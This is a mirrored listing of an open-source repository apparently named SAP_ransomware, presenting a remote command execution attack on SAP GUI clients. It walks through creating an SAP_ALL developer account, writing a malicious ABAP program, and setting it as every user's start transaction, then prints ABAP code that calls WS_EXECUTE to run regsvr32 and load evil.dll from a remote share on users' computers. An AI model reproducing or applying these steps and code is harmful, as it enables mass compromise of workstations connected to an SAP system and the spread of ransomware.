项目作者: vah13

项目描述 :
Simple remote command execution exploit code for SAP GUI
高级语言:
项目地址: git://github.com/vah13/SAP_ransomware.git
创建时间: 2018-01-18T11:45:31Z
项目社区:https://github.com/vah13/SAP_ransomware

开源协议:

下载


SAP ransomware sample

Simple remote command execution exploit code for SAP GUI
First of all need to create a malicious ABAP program on SAP NetWeaver AS ABAP

1) First of all, to get RCE on a client’s computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change any programs. To do this, run transaction su01 and create a new user with SAP_ALL rights under login EVIL_DEV.

2) Then, login as the EVIL_DEV user, run transaction se38 and create a program sap_malware_prog.

3) Then when we are able to create a program, we click the Insert button, then copy a program, which executes malicious functionality, then save all and activate the program.

4) Create custom transaction with se93

5) Connect custom transaction to malware program

6) Set mlauncher transaction by default

7) The screenshot shows that we set start transaction – mlauncher for all users.


ABAP code for execute any command in SAP clients hosts

  1. CALL FUNCTION 'WS_EXECUTE'
  2. EXPORTING
  3. program = 'c:\Windows\System32\regsvr32.exe'
  4. commandline = '/i /s \\REMOTE_FOLDER\tmp\evil.dll'
  5. INFORM = ''
  6. EXCEPTIONS
  7. FRONTEND_ERROR = 1
  8. NO_BATCH = 2
  9. PROG_NOT_FOUND = 3
  10. ILLEGAL_OPTION = 4
  11. GUI_REFUSE_EXECUTE = 5
  12. OTHERS = 6.

using this vulnerability developers or sap administrator can execute any command on users computers and infected them